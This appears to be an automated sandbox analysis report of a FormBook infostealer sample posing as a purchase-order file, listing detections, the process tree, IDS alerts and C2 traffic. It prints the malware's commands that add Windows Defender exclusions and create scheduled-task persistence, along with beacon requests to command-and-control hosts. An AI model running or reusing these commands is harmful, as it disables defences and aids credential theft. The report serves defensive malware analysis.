Windows Analysis Report
RFQ_P.O.1212024.scr

Overview

General Information

Sample name:RFQ_P.O.1212024.scr
Analysis ID:1573579
MD5:bc03b7d0cc3faa356f5c49609d150b44
SHA1:687546140c750b9b466f8da86c63cff613b727a2
SHA256:36389326c697d43ecf27b181b4ec997ffc45aa8b1cdca0cca34db3d43075cccd
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w7x64
  • RFQ_P.O.1212024.scr (PID: 3236 cmdline: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S MD5: BC03B7D0CC3FAA356F5C49609D150B44)
    • powershell.exe (PID: 3348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3412 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • RegSvcs.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
      • mrNbohrgjTw.exe (PID: 1696 cmdline: "C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 3736 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5F2122888583347C9B81724CF169EFC6)
          • mrNbohrgjTw.exe (PID: 1020 cmdline: "C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1372 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • taskeng.exe (PID: 3616 cmdline: taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • PEJmengI.exe (PID: 3660 cmdline: C:\Users\user\AppData\Roaming\PEJmengI.exe MD5: BC03B7D0CC3FAA356F5C49609D150B44)
      • powershell.exe (PID: 3764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3876 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 4008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
8.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", ProcessId: 3348, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PEJmengI.exe, ParentImage: C:\Users\user\AppData\Roaming\PEJmengI.exe, ParentProcessId: 3660, ParentProcessName: PEJmengI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp", ProcessId: 3876, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", ProcessId: 3412, ProcessName: schtasks.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msinfo32.exe, ProcessId: 3736, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr", ProcessId: 3348, ProcessName: powershell.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Local\Temp\gzkbfl5i.z03.ps1

                Persistence and Installation Behavior

                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S, ParentImage: C:\Users\user\Desktop\RFQ_P.O.1212024.scr, ParentProcessId: 3236, ParentProcessName: RFQ_P.O.1212024.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp", ProcessId: 3412, ProcessName: schtasks.exe

                AV Detection

                Source: RFQ_P.O.1212024.scr, Virustotal: Detection: 38%
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeJoe Sandbox ML: detected
                Source: RFQ_P.O.1212024.scrJoe Sandbox ML: detected
                Source: RFQ_P.O.1212024.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ_P.O.1212024.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: msinfo32.pdb source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb@ source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrNbohrgjTw.exe, 0000000B.00000000.379719754.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873854822.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: RegSvcs.pdb, source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002010000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396847773.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396514209.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002190000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.415871928.000000000094C000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659876
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_006598E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659C97
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_0065989A
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 4x nop then jmp 0065A2ADh0_2_00659922
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C94DE
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C9128
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C90DA
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C90B6
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C9162
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C95B9
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 4x nop then jmp 005C9AEDh10_2_005C934A

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49168 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 69.48.179.238:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49204 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 188.114.97.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49202 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 81.2.196.19:80
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeDNS query: www.zoiheat.xyz
                Source: unknownNetwork traffic detected: IP country count 10
                Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
                Source: Joe Sandbox ViewIP Address: 146.88.233.115 146.88.233.115
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: INTERNET-CZKtis238403KtisCZ INTERNET-CZKtis238403KtisCZ
                Source: C:\Windows\SysWOW64\msinfo32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3270000[1].zipJump to behavior
                Source: global trafficHTTP traffic detected: GET /ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y75 HTTP/1.1Host: www.zoiheat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
